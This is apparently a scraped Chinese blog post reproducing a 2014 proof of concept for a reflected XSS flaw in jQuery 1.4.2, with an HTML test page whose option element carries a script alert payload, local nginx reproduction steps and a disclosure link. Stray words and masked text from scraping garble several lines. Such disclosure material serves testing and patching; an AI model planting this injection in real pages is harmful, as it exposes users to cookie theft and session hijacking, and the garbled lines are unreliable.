XSS Reflected JQuery 1.4.2 - Create object option in runtime client-sidehtml
影響版本:jquery
JQuery-1.4.2nginx
危害:xss
JQuery 'index.html'不正確過濾用戶提交的輸入,遠程***者能夠利用漏洞構建惡意URI,誘使用戶解析,可得到敏感Cookie,劫持會話或在客戶端上進行惡意操做。
ide
測試:post
啓動nginx,並建立文件jquery-xss-reflected.com.br.html,內容爲:測試
<!DOCTYPE html>this
<! -- Mauro Risonho de Paula Assumpcao -->spa
<! -- aka firebits mauro.risonho () gmail com -->code
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil -->
<! -- _____.__ ___. .__ __
-->
<! -- _/ ____\__|______ ____\_ |__ |__|/ |_ ______ -->
<! -- \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ -->
<! -- | | | || | \/\ ___/| \_\ \ || | \___ \ -->
<! -- |__| |__||__| \___ |___ /__||__| /____ | -->
<! -- \/ \/ \/ -->
<! -- bits on fire - 1989-2014 - brazil -->
<! -- -->
<! -- * jQuery JavaScript Library v1.4.2 -->
<! -- * http://jquery.com/ -->
<! -- * -->
<! -- * Copyright 2010, John Resig -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses. -->
<! -- * http://jquery.org/license -->
<! -- * -->
<! -- * Includes Sizzle.js -->
<! -- * http://sizzlejs.com/ -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses. -->
<! -- * -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500 -->
<! -- */ -->
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="https://code.jquery.com/jquery-1.4.2.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="x***eflected"><script>alert('x***eflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil@firebitsbr - mauro.risonho () gmail com');</script></option>
</select>
</p>
</form>
</body>
</html>
訪問地址:
http://localhost/jquery-xss-reflected.com.br.html
測試截圖:
相關鏈接地址:
http://seclists.org/fulldisclosure/2014/Sep/10